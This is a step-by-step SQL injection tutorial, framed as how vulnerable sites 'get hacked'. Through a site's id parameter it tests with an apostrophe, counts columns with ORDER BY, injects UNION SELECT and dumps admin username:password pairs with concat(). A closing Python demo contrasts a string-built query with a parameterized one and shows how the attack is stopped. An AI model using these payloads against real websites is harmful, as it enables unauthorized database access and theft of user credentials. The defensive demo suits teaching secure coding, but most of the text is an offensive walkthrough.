SQL INJECTION

Now we are going to learn how sites that are vulnerable to SQL injection get hacked. So let's begin.

To check whether a site is vulnerable to SQL injection, first look at the URL. A candidate looks like this:

www.site.com/file.php?id=7

To test for the vulnerability, append an apostrophe to the end of the URL so it becomes:

www.site.com/file.php?id=7'

If, after hitting Enter, you see this text on the page:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc.

then the site is vulnerable to this attack: the apostrophe was pasted straight into the SQL statement and broke its syntax, which shows the id parameter is not being escaped or bound as a parameter.

FINDING THE COLUMNS

To find the number of columns the query returns, we use ORDER BY (which tells the database which column to sort the result by). We increment the column number until we get an error.

http://www.site.com/news.php?id=7 order by 1 -- no error

http://www.site.com/news.php?id=7 order by 2 -- no error

http://www.site.com/news.php?id=7 order by 3 -- error

So the query has 2 columns, because we got an error on the 3rd one.

CHECKING FOR UNION FUNCTION

Our next step is to check whether UNION works. With UNION we can append the rows of our own SELECT to the result of the original query, so we can read more data in one statement.

http://www.site.com/news.php?id=7 union all select 1,2

We select up to 2 because we discovered the number of columns was 2. So let's move on.

If we see a number on the screen, i.e. 1 or 2, that means the UNION works, and the number tells us which column the page displays.

GETTING TABLE AND COLUMN NAME

This is for MySQL versions below 5 (there is no information_schema on those versions, so table and column names have to be guessed). Note that the examples below use a three-column SELECT; in practice the count must match the number of columns you found with ORDER BY.

http://www.site.com/news.php?id=7 union all select 1,2,3 from admin

If we see the number 2 on the screen like before, we know that the table admin exists. Now, to check column names, we craft a query:

http://www.site.com/news.php?id=7 union all select 1,2,username from admin

We get a username displayed on screen, so the column exists.

Now to check for the column password:

http://www.site.com/news.php?id=7 union all select 1,2,password from admin

If that succeeds, we will see a password on the screen. It can be plain text or a hash, depending on how the application stores it. Now we complete the query using the concat() function (it joins strings):

http://www.site.com/news.php?id=7 union all select 1,2,concat(username,0x3a,password)from admin

Note the 0x3a: it is the hex value for a colon, so the two fields come out separated by ":".

Now username:password is displayed on screen.
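To show why each probe above behaves as it does, and what stops it, here is an added example (not part of the original tutorial) that runs the same three inputs against a constructed in-memory SQLite news table, once through a lookup that pastes id into the SQL string like the vulnerable news.php, and once through a lookup that validates id as an integer and binds it as a parameter. The table, rows and function names are assumptions for the demo; SQLite's error text differs from MySQL's, but the failure modes line up.

```python
import sqlite3

# Constructed sample data standing in for the site's news table.
SAMPLE_ROWS = [(7, "Welcome"), (8, "Second post")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, id_param):
    """The pattern the tutorial exploits: the id parameter is pasted
    straight into the SQL text, so the database parses it as SQL."""
    sql = f"SELECT id, title FROM news WHERE id={id_param}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """Hardened lookup: reject anything that is not an integer, then
    bind it as a parameter so it is only ever treated as a value."""
    try:
        news_id = int(id_param)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id, title FROM news WHERE id=?"
    return conn.execute(sql, (news_id,)).fetchall()


def probe(fn, id_param):
    """Run one lookup on a fresh DB and report ('rows', result)
    or ('error', message), mirroring the page's error/no-error test."""
    conn = make_db()
    try:
        return ("rows", fn(conn, id_param))
    except sqlite3.Error as e:
        return ("error", str(e))


if __name__ == "__main__":
    for value in ["7", "7'", "7 order by 2", "7 order by 3",
                  "7 union all select 1,2"]:
        print(repr(value), "vulnerable:", probe(lookup_vulnerable, value))
        print(repr(value), "safe:      ", probe(lookup_safe, value))
```

Against the vulnerable lookup the apostrophe and "order by 3" raise syntax/range errors and the UNION appends the row (1, 2), exactly the signals the tutorial relies on; against the safe lookup every malformed value simply returns no rows.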
